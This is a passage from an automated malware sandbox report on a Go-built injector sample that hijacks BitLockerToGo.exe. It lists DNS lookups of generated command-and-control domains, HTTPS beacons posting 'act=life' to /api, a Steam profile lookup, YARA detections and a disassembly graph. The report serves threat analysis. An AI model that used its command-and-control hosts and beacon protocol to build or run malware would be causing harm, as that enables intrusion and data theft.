                                                                                                                                                                Oct 2, 2024 15:01:27.002294064 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.002371073 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.002389908 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.002548933 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.007591963 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.007671118 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.007756948 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.008069992 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.008069992 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.008069992 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.041167974 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.041217089 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.041300058 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.041656971 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.041671991 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.319411993 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.319452047 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.501784086 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.501888990 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.569879055 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.569902897 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.570205927 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.572895050 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.572935104 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:27.572983027 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:28.195255041 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:28.195338011 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:28.195406914 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:28.234848976 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:28.234870911 CEST44349711172.67.209.193192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:28.234880924 CEST49711443192.168.2.7172.67.209.193
                                                                                                                                                                Oct 2, 2024 15:01:28.234889984 CEST44349711172.67.209.193192.168.2.7

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 2, 2024 15:01:24.506705999 CEST5862553192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:24.521286964 CEST53586251.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.654109001 CEST5827353192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.663218021 CEST53582731.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.664378881 CEST4961853192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.673041105 CEST53496181.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.674205065 CEST5572253192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.683346033 CEST53557221.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.684434891 CEST5155053192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.693389893 CEST53515501.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.694641113 CEST4995453192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.704153061 CEST53499541.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.706664085 CEST5721353192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.716595888 CEST53572131.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.718924999 CEST6480153192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.727694988 CEST53648011.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.729660988 CEST5678753192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.739121914 CEST53567871.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.741760015 CEST6158753192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:25.749224901 CEST53615871.1.1.1192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:27.025995970 CEST5404053192.168.2.71.1.1.1
                                                                                                                                                                Oct 2, 2024 15:01:27.039755106 CEST53540401.1.1.1192.168.2.7

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Oct 2, 2024 15:01:24.506705999 CEST192.168.2.71.1.1.10x6af1Standard query (0)dividenntykw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.654109001 CEST192.168.2.71.1.1.10x5beaStandard query (0)racedsuitreow.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.664378881 CEST192.168.2.71.1.1.10x9402Standard query (0)defenddsouneuw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.674205065 CEST192.168.2.71.1.1.10x25e8Standard query (0)deallyharvenw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.684434891 CEST192.168.2.71.1.1.10x5a59Standard query (0)priooozekw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.694641113 CEST192.168.2.71.1.1.10x4a49Standard query (0)pumpkinkwquo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.706664085 CEST192.168.2.71.1.1.10xa2ecStandard query (0)abortinoiwiam.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.718924999 CEST192.168.2.71.1.1.10xe4aaStandard query (0)surroundeocw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.729660988 CEST192.168.2.71.1.1.10xdf40Standard query (0)covvercilverow.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.741760015 CEST192.168.2.71.1.1.10xa803Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:27.025995970 CEST192.168.2.71.1.1.10x35d7Standard query (0)gravvitywio.storeA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Oct 2, 2024 15:01:24.521286964 CEST1.1.1.1192.168.2.70x6af1No error (0)dividenntykw.shop104.21.8.235A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:24.521286964 CEST1.1.1.1192.168.2.70x6af1No error (0)dividenntykw.shop172.67.188.210A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.663218021 CEST1.1.1.1192.168.2.70x5beaName error (3)racedsuitreow.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.673041105 CEST1.1.1.1192.168.2.70x9402Name error (3)defenddsouneuw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.683346033 CEST1.1.1.1192.168.2.70x25e8Name error (3)deallyharvenw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.693389893 CEST1.1.1.1192.168.2.70x5a59Name error (3)priooozekw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.704153061 CEST1.1.1.1192.168.2.70x4a49Name error (3)pumpkinkwquo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.716595888 CEST1.1.1.1192.168.2.70xa2ecName error (3)abortinoiwiam.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.727694988 CEST1.1.1.1192.168.2.70xe4aaName error (3)surroundeocw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.739121914 CEST1.1.1.1192.168.2.70xdf40Name error (3)covvercilverow.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:25.749224901 CEST1.1.1.1192.168.2.70xa803No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:27.039755106 CEST1.1.1.1192.168.2.70x35d7No error (0)gravvitywio.store172.67.209.193A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 15:01:27.039755106 CEST1.1.1.1192.168.2.70x35d7No error (0)gravvitywio.store104.21.16.12A (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • dividenntykw.shop
                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                • gravvitywio.store

                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.749709104.21.8.2354437816C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 13:01:25 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: dividenntykw.shop
                                                                                                                                                                2024-10-02 13:01:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                2024-10-02 13:01:25 UTC768INHTTP/1.1 200 OK
                                                                                                                                                                Date: Wed, 02 Oct 2024 13:01:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=2cqqd45juec7pgh7rroa6c91lg; expires=Sun, 26 Jan 2025 06:48:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCAnHsgcM2rl8qMtGWfujgYAfAlzufiO8Uccknq6Qn78SQg4VO8jx3Kcx4z46FUdjpC4SPIp7dNUbNlkC7O1iPnCGxwS0brpnJTV6hWhhZKWt4UrSLvgW5ejKpVYEzp3LcOeNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cc4e188ba20c35d-EWR
                                                                                                                                                                2024-10-02 13:01:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                2024-10-02 13:01:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.749710104.102.49.2544437816C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 13:01:26 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                2024-10-02 13:01:26 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Date: Wed, 02 Oct 2024 13:01:26 GMT
                                                                                                                                                                Content-Length: 34837
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: sessionid=2b82286952de39ddee451a4d; Path=/; Secure; SameSite=None
                                                                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                2024-10-02 13:01:26 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                2024-10-02 13:01:26 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                2024-10-02 13:01:27 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                2024-10-02 13:01:27 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.749711172.67.209.1934437816C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-10-02 13:01:27 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: gravvitywio.store
                                                                                                                                                                2024-10-02 13:01:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                2024-10-02 13:01:28 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                Date: Wed, 02 Oct 2024 13:01:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=aumm0lth9i97gan58lf3f2mpos; expires=Sun, 26 Jan 2025 06:48:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVh0IXw%2BZ%2FYbOnl6F7t6bBJ%2BUL8OTy1R7f9x7KtfRL0FDs5PVekJUaWNmad1h8zwQYc4H47Exg8MX7YDzLSLcV%2BEch5ucL2r2EQgnMrjoPU5HQ1%2FMzX2I7ITFLgCcKIkNqknKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cc4e197a963de98-EWR
                                                                                                                                                                2024-10-02 13:01:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                2024-10-02 13:01:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:09:00:41
                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\7wN7BF7WfX.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\7wN7BF7WfX.exe"
                                                                                                                                                                Imagebase:0x7ff7a1880000
                                                                                                                                                                File size:14'180'600 bytes
                                                                                                                                                                MD5 hash:A0339542BAA3175D220C11A7FE75D0FC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Go lang
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1736916326.000000C000860000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1736585848.000000C000480000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1738001301.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1305930689.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:10:41:00
                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                Imagebase:0x3b0000
                                                                                                                                                                File size:231'736 bytes
                                                                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:34.9%
                                                                                                                                                                  Total number of Nodes:63
                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                  execution_graph 21575 2b0fe90 21576 2b0ff20 21575->21576 21577 2b0ff45 21576->21577 21579 2b46f90 21576->21579 21580 2b47037 21579->21580 21581 2b4702c 21579->21581 21582 2b46fb9 21579->21582 21583 2b46fab 21579->21583 21591 2b44470 21580->21591 21588 2b443e0 21581->21588 21584 2b47016 RtlReAllocateHeap 21582->21584 21583->21580 21583->21582 21587 2b47032 21584->21587 21587->21577 21589 2b44426 RtlAllocateHeap 21588->21589 21590 2b443fa 21588->21590 21590->21589 21592 2b444d9 21591->21592 21594 2b44486 21591->21594 21592->21587 21593 2b444c6 RtlFreeHeap 21593->21592 21594->21593 21595 2b0d360 21596 2b0d369 21595->21596 21597 2b0d371 GetInputState 21596->21597 21598 2b0d53e ExitProcess 21596->21598 21599 2b0d37e 21597->21599 21600 2b0d386 GetCurrentThreadId GetCurrentProcessId 21599->21600 21601 2b0d539 21599->21601 21604 2b0d3b8 21600->21604 21612 2b46f70 FreeLibrary 21601->21612 21607 2b0eed0 21604->21607 21605 2b0d52b 21605->21601 21611 2b104d0 FreeLibrary 21605->21611 21608 2b0ef38 21607->21608 21609 2b0f00c LoadLibraryExW 21608->21609 21610 2b0f023 21609->21610 21610->21605 21611->21601 21612->21598 21613 2b47cb5 21614 2b478bc 21613->21614 21616 2b478d0 21614->21616 21620 2b47590 LdrInitializeThunk 21614->21620 21619 2b47590 LdrInitializeThunk 21616->21619 21618 2b47a03 21619->21618 21620->21616 21621 2b104e0 21624 2b1073f 21621->21624 21622 2b10b77 21623 2b46f90 3 API calls 21623->21624 21624->21622 21624->21623 21624->21624 21635 2b47af2 21636 2b47b05 21635->21636 21637 2b47b7f 21636->21637 21638 2b47fce 21636->21638 21643 2b47590 LdrInitializeThunk 21636->21643 21642 2b47590 LdrInitializeThunk 21638->21642 21641 2b480f1 21642->21641 21643->21638 21644 2b47803 21645 2b47832 21644->21645 21646 2b4788e 21645->21646 21648 2b47590 LdrInitializeThunk 21645->21648 21648->21646 21649 2b47a0e 21650 2b47a0c 21649->21650 21650->21649 21652 2b478e0 21650->21652 21656 2b47590 LdrInitializeThunk 21650->21656 21655 2b47590 LdrInitializeThunk 21652->21655 21654 2b47a03 21655->21654 21656->21650 21657 2b46928 21658 2b46994 LoadLibraryExW 21657->21658 21659 2b46969 21657->21659 21660 2b469a6 21658->21660 21659->21658

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 02B0FE90 Relevance: 6.7, Strings: 5, Instructions: 404COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
